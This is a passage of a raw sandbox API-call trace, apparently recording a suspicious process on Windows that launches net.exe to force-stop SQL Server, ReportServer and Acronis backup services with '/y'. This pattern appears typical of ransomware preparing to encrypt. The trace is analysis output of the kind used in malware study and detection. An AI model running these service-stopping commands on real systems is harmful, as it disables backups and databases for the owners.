[0200.514] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4462c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nD", lpUsedDefaultChar=0x0) returned 2 [0200.514] WriteFile (in: hFile=0x26c, lpBuffer=0x4462c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x24fc0c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x24fc0c, lpOverlapped=0x0) returned 0 [0200.514] LocalFree (hMem=0x4462c8) returned 0x0 [0200.514] NetApiBufferFree (Buffer=0x441c80) returned 0x0 [0200.515] NetApiBufferFree (Buffer=0x441c98) returned 0x0 [0200.515] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SBSMONITORING /y" [0200.515] exit (_Code=2) Process: id = "170" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1606d000" os_pid = "0x784" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ReportServer$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 343 os_tid = 0x7dc Process: id = "171" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6ae70000" os_pid = "0x580" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "170" os_parent_pid = "0x784" cmd_line = "C:\\Windows\\system32\\net1 stop ReportServer$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 344 os_tid = 0x82c [0200.648] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x36f874 | out: lpSystemTimeAsFileTime=0x36f874*(dwLowDateTime=0x40c81e00, dwHighDateTime=0x1d57a87)) [0200.648] GetCurrentProcessId () returned 0x580 [0200.648] GetCurrentThreadId () returned 0x82c [0200.648] GetTickCount () returned 0x116bcda [0200.648] QueryPerformanceCounter (in: lpPerformanceCount=0x36f86c | out: lpPerformanceCount=0x36f86c*=32093291636) returned 1 [0200.649] GetModuleHandleA (lpModuleName=0x0) returned 0x200000 [0200.649] __set_app_type (_Type=0x1) [0200.649] __p__fmode () returned 0x74eb31f4 [0200.649] __p__commode () returned 0x74eb31fc [0200.649] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x20ffe6) returned 0x0 [0200.649] __getmainargs (in: _Argc=0x219064, _Argv=0x21906c, _Env=0x219068, _DoWildCard=0, _StartInfo=0x219024 | out: _Argc=0x219064, _Argv=0x21906c, _Env=0x219068) returned 0 [0200.649] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0200.649] GetConsoleOutputCP () returned 0x1b5 [0200.649] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x219080 | out: lpCPInfo=0x219080) returned 1 [0200.649] SetThreadUILanguage (LangId=0x0) returned 0x409 [0200.652] sprintf_s (in: _DstBuf=0x36f82c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0200.653] setlocale (category=0, locale=".437") returned="English_United States.437" [0200.654] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0200.654] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0200.654] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$SYSTEM_BGC /y" [0200.654] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x36f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0200.654] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x82) returned 0x6a4bf8 [0200.655] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0200.655] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x36f7fc | out: Buffer=0x36f7fc*=0x6a1c90) returned 0x0 [0200.655] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x36f7fc | out: Buffer=0x36f7fc*=0x6a1ca8) returned 0x0 [0200.655] _fileno (_File=0x74eb2900) returned -2 [0200.655] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0200.655] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0200.655] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0200.655] _wcsicmp (_String1="config", _String2="stop") returned -16 [0200.655] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0200.655] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0200.655] _wcsicmp (_String1="file", _String2="stop") returned -13 [0200.655] _wcsicmp (_String1="files", _String2="stop") returned -13 [0200.655] _wcsicmp (_String1="group", _String2="stop") returned -12 [0200.655] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0200.655] _wcsicmp (_String1="help", _String2="stop") returned -11 [0200.655] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0200.655] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0200.655] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0200.655] _wcsicmp (_String1="session", _String2="stop") returned -15 [0200.656] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0200.656] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0200.656] _wcsicmp (_String1="share", _String2="stop") returned -12 [0200.656] _wcsicmp (_String1="start", _String2="stop") returned -14 [0200.656] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0200.656] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0200.656] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0200.656] _wcsicmp (_String1="accounts", _String2="ReportServer$SYSTEM_BGC") returned -17 [0200.656] _wcsicmp (_String1="computer", _String2="ReportServer$SYSTEM_BGC") returned -15 [0200.656] _wcsicmp (_String1="config", _String2="ReportServer$SYSTEM_BGC") returned -15 [0200.656] _wcsicmp (_String1="continue", _String2="ReportServer$SYSTEM_BGC") returned -15 [0200.656] _wcsicmp (_String1="cont", _String2="ReportServer$SYSTEM_BGC") returned -15 [0200.656] _wcsicmp (_String1="file", _String2="ReportServer$SYSTEM_BGC") returned -12 [0200.656] _wcsicmp (_String1="files", _String2="ReportServer$SYSTEM_BGC") returned -12 [0200.656] _wcsicmp (_String1="group", _String2="ReportServer$SYSTEM_BGC") returned -11 [0200.656] _wcsicmp (_String1="groups", _String2="ReportServer$SYSTEM_BGC") returned -11 [0200.656] _wcsicmp (_String1="help", _String2="ReportServer$SYSTEM_BGC") returned -10 [0200.656] _wcsicmp (_String1="helpmsg", _String2="ReportServer$SYSTEM_BGC") returned -10 [0200.656] _wcsicmp (_String1="localgroup", _String2="ReportServer$SYSTEM_BGC") returned -6 [0200.656] _wcsicmp (_String1="pause", _String2="ReportServer$SYSTEM_BGC") returned -2 [0200.656] _wcsicmp (_String1="session", _String2="ReportServer$SYSTEM_BGC") returned 1 [0200.656] _wcsicmp (_String1="sessions", _String2="ReportServer$SYSTEM_BGC") returned 1 [0200.656] _wcsicmp (_String1="sess", _String2="ReportServer$SYSTEM_BGC") returned 1 [0200.656] _wcsicmp (_String1="share", _String2="ReportServer$SYSTEM_BGC") returned 1 [0200.656] _wcsicmp (_String1="start", _String2="ReportServer$SYSTEM_BGC") returned 1 [0200.656] _wcsicmp (_String1="stats", _String2="ReportServer$SYSTEM_BGC") returned 1 [0200.656] _wcsicmp (_String1="statistics", _String2="ReportServer$SYSTEM_BGC") returned 1 [0200.656] _wcsicmp (_String1="stop", _String2="ReportServer$SYSTEM_BGC") returned 1 [0200.656] _wcsicmp (_String1="time", _String2="ReportServer$SYSTEM_BGC") returned 2 [0200.656] _wcsicmp (_String1="user", _String2="ReportServer$SYSTEM_BGC") returned 3 [0200.656] _wcsicmp (_String1="users", _String2="ReportServer$SYSTEM_BGC") returned 3 [0200.656] _wcsicmp (_String1="msg", _String2="ReportServer$SYSTEM_BGC") returned -5 [0200.656] _wcsicmp (_String1="messenger", _String2="ReportServer$SYSTEM_BGC") returned -5 [0200.656] _wcsicmp (_String1="receiver", _String2="ReportServer$SYSTEM_BGC") returned -13 [0200.656] _wcsicmp (_String1="rcv", _String2="ReportServer$SYSTEM_BGC") returned -2 [0200.656] _wcsicmp (_String1="netpopup", _String2="ReportServer$SYSTEM_BGC") returned -4 [0200.656] _wcsicmp (_String1="redirector", _String2="ReportServer$SYSTEM_BGC") returned -12 [0200.657] _wcsicmp (_String1="redir", _String2="ReportServer$SYSTEM_BGC") returned -12 [0200.657] _wcsicmp (_String1="rdr", _String2="ReportServer$SYSTEM_BGC") returned -1 [0200.657] _wcsicmp (_String1="workstation", _String2="ReportServer$SYSTEM_BGC") returned 5 [0200.657] _wcsicmp (_String1="work", _String2="ReportServer$SYSTEM_BGC") returned 5 [0200.657] _wcsicmp (_String1="wksta", _String2="ReportServer$SYSTEM_BGC") returned 5 [0200.657] _wcsicmp (_String1="prdr", _String2="ReportServer$SYSTEM_BGC") returned -2 [0200.657] _wcsicmp (_String1="devrdr", _String2="ReportServer$SYSTEM_BGC") returned -14 [0200.657] _wcsicmp (_String1="lanmanworkstation", _String2="ReportServer$SYSTEM_BGC") returned -6 [0200.657] _wcsicmp (_String1="server", _String2="ReportServer$SYSTEM_BGC") returned 1 [0200.657] _wcsicmp (_String1="svr", _String2="ReportServer$SYSTEM_BGC") returned 1 [0200.657] _wcsicmp (_String1="srv", _String2="ReportServer$SYSTEM_BGC") returned 1 [0200.657] _wcsicmp (_String1="lanmanserver", _String2="ReportServer$SYSTEM_BGC") returned -6 [0200.657] _wcsicmp (_String1="alerter", _String2="ReportServer$SYSTEM_BGC") returned -17 [0200.657] _wcsicmp (_String1="netlogon", _String2="ReportServer$SYSTEM_BGC") returned -4 [0200.657] _wcsupr (in: _String="ReportServer$SYSTEM_BGC" | out: _String="REPORTSERVER$SYSTEM_BGC") returned="REPORTSERVER$SYSTEM_BGC" [0200.657] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6a54d0 [0200.659] GetServiceKeyNameW (in: hSCManager=0x6a54d0, lpDisplayName="REPORTSERVER$SYSTEM_BGC", lpServiceName=0x21aaf0, lpcchBuffer=0x36f798 | out: lpServiceName="", lpcchBuffer=0x36f798) returned 0 [0200.660] _wcsicmp (_String1="msg", _String2="REPORTSERVER$SYSTEM_BGC") returned -5 [0200.660] _wcsicmp (_String1="messenger", _String2="REPORTSERVER$SYSTEM_BGC") returned -5 [0200.660] _wcsicmp (_String1="receiver", _String2="REPORTSERVER$SYSTEM_BGC") returned -13 [0200.660] _wcsicmp (_String1="rcv", _String2="REPORTSERVER$SYSTEM_BGC") returned -2 [0200.660] _wcsicmp (_String1="redirector", _String2="REPORTSERVER$SYSTEM_BGC") returned -12 [0200.660] _wcsicmp (_String1="redir", _String2="REPORTSERVER$SYSTEM_BGC") returned -12 [0200.660] _wcsicmp (_String1="rdr", _String2="REPORTSERVER$SYSTEM_BGC") returned -1 [0200.660] _wcsicmp (_String1="workstation", _String2="REPORTSERVER$SYSTEM_BGC") returned 5 [0200.660] _wcsicmp (_String1="work", _String2="REPORTSERVER$SYSTEM_BGC") returned 5 [0200.660] _wcsicmp (_String1="wksta", _String2="REPORTSERVER$SYSTEM_BGC") returned 5 [0200.660] _wcsicmp (_String1="prdr", _String2="REPORTSERVER$SYSTEM_BGC") returned -2 [0200.660] _wcsicmp (_String1="devrdr", _String2="REPORTSERVER$SYSTEM_BGC") returned -14 [0200.660] _wcsicmp (_String1="lanmanworkstation", _String2="REPORTSERVER$SYSTEM_BGC") returned -6 [0200.660] _wcsicmp (_String1="server", _String2="REPORTSERVER$SYSTEM_BGC") returned 1 [0200.660] _wcsicmp (_String1="svr", _String2="REPORTSERVER$SYSTEM_BGC") returned 1 [0200.660] _wcsicmp (_String1="srv", _String2="REPORTSERVER$SYSTEM_BGC") returned 1 [0200.660] _wcsicmp (_String1="lanmanserver", _String2="REPORTSERVER$SYSTEM_BGC") returned -6 [0200.660] _wcsicmp (_String1="alerter", _String2="REPORTSERVER$SYSTEM_BGC") returned -17 [0200.660] _wcsicmp (_String1="netlogon", _String2="REPORTSERVER$SYSTEM_BGC") returned -4 [0200.660] NetServiceControl (in: servername=0x0, service="REPORTSERVER$SYSTEM_BGC", opcode=0x0, arg=0x0, bufptr=0x36f794 | out: bufptr=0x36f794) returned 0x889 [0200.661] wcscpy_s (in: _Destination=0x21a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0200.661] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0200.662] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x21b338, nSize=0x800, Arguments=0x219dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0200.663] GetFileType (hFile=0x26c) returned 0x3 [0200.663] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x6a3ca0 [0200.663] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x6a3ca0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0200.663] WriteFile (in: hFile=0x26c, lpBuffer=0x6a3ca0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x36f6d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36f6d4, lpOverlapped=0x0) returned 0 [0200.663] LocalFree (hMem=0x6a3ca0) returned 0x0 [0200.663] GetFileType (hFile=0x26c) returned 0x3 [0200.663] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6a6298 [0200.663] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6a6298, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nj", lpUsedDefaultChar=0x0) returned 2 [0200.663] WriteFile (in: hFile=0x26c, lpBuffer=0x6a6298, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x36f6d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36f6d4, lpOverlapped=0x0) returned 0 [0200.663] LocalFree (hMem=0x6a6298) returned 0x0 [0200.663] _ultow (in: _Dest=0x889, _Radix=3602180 | out: _Dest=0x889) returned="2185" [0200.663] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x21b338, nSize=0x800, Arguments=0x219dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0200.664] GetFileType (hFile=0x26c) returned 0x3 [0200.664] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6a6298 [0200.664] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6a6298, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0200.664] WriteFile (in: hFile=0x26c, lpBuffer=0x6a6298, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x36f6e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36f6e0, lpOverlapped=0x0) returned 0 [0200.664] LocalFree (hMem=0x6a6298) returned 0x0 [0200.664] GetFileType (hFile=0x26c) returned 0x3 [0200.664] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6a6298 [0200.664] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6a6298, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nj", lpUsedDefaultChar=0x0) returned 2 [0200.664] WriteFile (in: hFile=0x26c, lpBuffer=0x6a6298, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x36f6e0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36f6e0, lpOverlapped=0x0) returned 0 [0200.664] LocalFree (hMem=0x6a6298) returned 0x0 [0200.664] NetApiBufferFree (Buffer=0x6a1c90) returned 0x0 [0200.665] NetApiBufferFree (Buffer=0x6a1ca8) returned 0x0 [0200.665] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ReportServer$SYSTEM_BGC /y" [0200.665] exit (_Code=2) Process: id = "172" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5b472000" os_pid = "0x1ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop AcronisAgent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 345 os_tid = 0x63c Process: id = "173" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x2571c000" os_pid = "0x3f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "172" os_parent_pid = "0x1ec" cmd_line = "C:\\Windows\\system32\\net1 stop AcronisAgent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 346 os_tid = 0x868 [0200.807] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f8f8 | out: lpSystemTimeAsFileTime=0x18f8f8*(dwLowDateTime=0x40e24d20, dwHighDateTime=0x1d57a87)) [0200.807] GetCurrentProcessId () returned 0x3f4 [0200.807] GetCurrentThreadId () returned 0x868 [0200.807] GetTickCount () returned 0x116bd86 [0200.807] QueryPerformanceCounter (in: lpPerformanceCount=0x18f8f0 | out: lpPerformanceCount=0x18f8f0*=32109192896) returned 1 [0200.808] GetModuleHandleA (lpModuleName=0x0) returned 0x1d0000 [0200.808] __set_app_type (_Type=0x1) [0200.808] __p__fmode () returned 0x74eb31f4 [0200.808] __p__commode () returned 0x74eb31fc [0200.808] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1dffe6) returned 0x0 [0200.808] __getmainargs (in: _Argc=0x1e9064, _Argv=0x1e906c, _Env=0x1e9068, _DoWildCard=0, _StartInfo=0x1e9024 | out: _Argc=0x1e9064, _Argv=0x1e906c, _Env=0x1e9068) returned 0 [0200.808] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0200.808] GetConsoleOutputCP () returned 0x1b5 [0200.808] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x1e9080 | out: lpCPInfo=0x1e9080) returned 1 [0200.808] SetThreadUILanguage (LangId=0x0) returned 0x409 [0200.811] sprintf_s (in: _DstBuf=0x18f8b0, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0200.811] setlocale (category=0, locale=".437") returned="English_United States.437" [0200.813] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0200.813] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0200.813] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AcronisAgent /y" [0200.813] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f67c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0200.813] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x6c) returned 0x683c10 [0200.813] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0200.814] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18f880 | out: Buffer=0x18f880*=0x681c70) returned 0x0 [0200.814] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18f880 | out: Buffer=0x18f880*=0x681c88) returned 0x0 [0200.814] _fileno (_File=0x74eb2900) returned -2 [0200.814] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0200.814] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0200.814] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0200.814] _wcsicmp (_String1="config", _String2="stop") returned -16 [0200.814] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0200.814] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0200.814] _wcsicmp (_String1="file", _String2="stop") returned -13 [0200.814] _wcsicmp (_String1="files", _String2="stop") returned -13 [0200.814] _wcsicmp (_String1="group", _String2="stop") returned -12 [0200.814] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0200.814] _wcsicmp (_String1="help", _String2="stop") returned -11 [0200.814] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0200.814] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0200.814] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0200.814] _wcsicmp (_String1="session", _String2="stop") returned -15 [0200.814] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0200.814] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0200.814] _wcsicmp (_String1="share", _String2="stop") returned -12 [0200.814] _wcsicmp (_String1="start", _String2="stop") returned -14 [0200.814] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0200.814] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0200.814] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0200.814] _wcsicmp (_String1="accounts", _String2="AcronisAgent") returned -15 [0200.814] _wcsicmp (_String1="computer", _String2="AcronisAgent") returned 2 [0200.814] _wcsicmp (_String1="config", _String2="AcronisAgent") returned 2 [0200.815] _wcsicmp (_String1="continue", _String2="AcronisAgent") returned 2 [0200.815] _wcsicmp (_String1="cont", _String2="AcronisAgent") returned 2 [0200.815] _wcsicmp (_String1="file", _String2="AcronisAgent") returned 5 [0200.815] _wcsicmp (_String1="files", _String2="AcronisAgent") returned 5 [0200.815] _wcsicmp (_String1="group", _String2="AcronisAgent") returned 6 [0200.815] _wcsicmp (_String1="groups", _String2="AcronisAgent") returned 6 [0200.815] _wcsicmp (_String1="help", _String2="AcronisAgent") returned 7 [0200.815] _wcsicmp (_String1="helpmsg", _String2="AcronisAgent") returned 7 [0200.815] _wcsicmp (_String1="localgroup", _String2="AcronisAgent") returned 11 [0200.815] _wcsicmp (_String1="pause", _String2="AcronisAgent") returned 15 [0200.815] _wcsicmp (_String1="session", _String2="AcronisAgent") returned 18 [0200.815] _wcsicmp (_String1="sessions", _String2="AcronisAgent") returned 18 [0200.815] _wcsicmp (_String1="sess", _String2="AcronisAgent") returned 18 [0200.815] _wcsicmp (_String1="share", _String2="AcronisAgent") returned 18 [0200.815] _wcsicmp (_String1="start", _String2="AcronisAgent") returned 18 [0200.815] _wcsicmp (_String1="stats", _String2="AcronisAgent") returned 18 [0200.815] _wcsicmp (_String1="statistics", _String2="AcronisAgent") returned 18 [0200.815] _wcsicmp (_String1="stop", _String2="AcronisAgent") returned 18 [0200.815] _wcsicmp (_String1="time", _String2="AcronisAgent") returned 19 [0200.815] _wcsicmp (_String1="user", _String2="AcronisAgent") returned 20 [0200.815] _wcsicmp (_String1="users", _String2="AcronisAgent") returned 20 [0200.815] _wcsicmp (_String1="msg", _String2="AcronisAgent") returned 12 [0200.815] _wcsicmp (_String1="messenger", _String2="AcronisAgent") returned 12 [0200.815] _wcsicmp (_String1="receiver", _String2="AcronisAgent") returned 17 [0200.815] _wcsicmp (_String1="rcv", _String2="AcronisAgent") returned 17 [0200.815] _wcsicmp (_String1="netpopup", _String2="AcronisAgent") returned 13 [0200.815] _wcsicmp (_String1="redirector", _String2="AcronisAgent") returned 17 [0200.815] _wcsicmp (_String1="redir", _String2="AcronisAgent") returned 17 [0200.815] _wcsicmp (_String1="rdr", _String2="AcronisAgent") returned 17 [0200.815] _wcsicmp (_String1="workstation", _String2="AcronisAgent") returned 22 [0200.815] _wcsicmp (_String1="work", _String2="AcronisAgent") returned 22 [0200.815] _wcsicmp (_String1="wksta", _String2="AcronisAgent") returned 22 [0200.815] _wcsicmp (_String1="prdr", _String2="AcronisAgent") returned 15 [0200.815] _wcsicmp (_String1="devrdr", _String2="AcronisAgent") returned 3 [0200.815] _wcsicmp (_String1="lanmanworkstation", _String2="AcronisAgent") returned 11 [0200.815] _wcsicmp (_String1="server", _String2="AcronisAgent") returned 18 [0200.816] _wcsicmp (_String1="svr", _String2="AcronisAgent") returned 18 [0200.816] _wcsicmp (_String1="srv", _String2="AcronisAgent") returned 18 [0200.816] _wcsicmp (_String1="lanmanserver", _String2="AcronisAgent") returned 11 [0200.816] _wcsicmp (_String1="alerter", _String2="AcronisAgent") returned 9 [0200.816] _wcsicmp (_String1="netlogon", _String2="AcronisAgent") returned 13 [0200.816] _wcsupr (in: _String="AcronisAgent" | out: _String="ACRONISAGENT") returned="ACRONISAGENT" [0200.816] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6854d0 [0200.818] GetServiceKeyNameW (in: hSCManager=0x6854d0, lpDisplayName="ACRONISAGENT", lpServiceName=0x1eaaf0, lpcchBuffer=0x18f81c | out: lpServiceName="", lpcchBuffer=0x18f81c) returned 0 [0200.819] _wcsicmp (_String1="msg", _String2="ACRONISAGENT") returned 12 [0200.819] _wcsicmp (_String1="messenger", _String2="ACRONISAGENT") returned 12 [0200.819] _wcsicmp (_String1="receiver", _String2="ACRONISAGENT") returned 17 [0200.819] _wcsicmp (_String1="rcv", _String2="ACRONISAGENT") returned 17 [0200.819] _wcsicmp (_String1="redirector", _String2="ACRONISAGENT") returned 17 [0200.819] _wcsicmp (_String1="redir", _String2="ACRONISAGENT") returned 17 [0200.819] _wcsicmp (_String1="rdr", _String2="ACRONISAGENT") returned 17 [0200.819] _wcsicmp (_String1="workstation", _String2="ACRONISAGENT") returned 22 [0200.819] _wcsicmp (_String1="work", _String2="ACRONISAGENT") returned 22 [0200.819] _wcsicmp (_String1="wksta", _String2="ACRONISAGENT") returned 22 [0200.819] _wcsicmp (_String1="prdr", _String2="ACRONISAGENT") returned 15 [0200.819] _wcsicmp (_String1="devrdr", _String2="ACRONISAGENT") returned 3 [0200.819] _wcsicmp (_String1="lanmanworkstation", _String2="ACRONISAGENT") returned 11 [0200.819] _wcsicmp (_String1="server", _String2="ACRONISAGENT") returned 18 [0200.819] _wcsicmp (_String1="svr", _String2="ACRONISAGENT") returned 18 [0200.819] _wcsicmp (_String1="srv", _String2="ACRONISAGENT") returned 18 [0200.819] _wcsicmp (_String1="lanmanserver", _String2="ACRONISAGENT") returned 11 [0200.819] _wcsicmp (_String1="alerter", _String2="ACRONISAGENT") returned 9 [0200.819] _wcsicmp (_String1="netlogon", _String2="ACRONISAGENT") returned 13 [0200.819] NetServiceControl (in: servername=0x0, service="ACRONISAGENT", opcode=0x0, arg=0x0, bufptr=0x18f818 | out: bufptr=0x18f818) returned 0x889 [0200.820] wcscpy_s (in: _Destination=0x1ea4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0200.820] 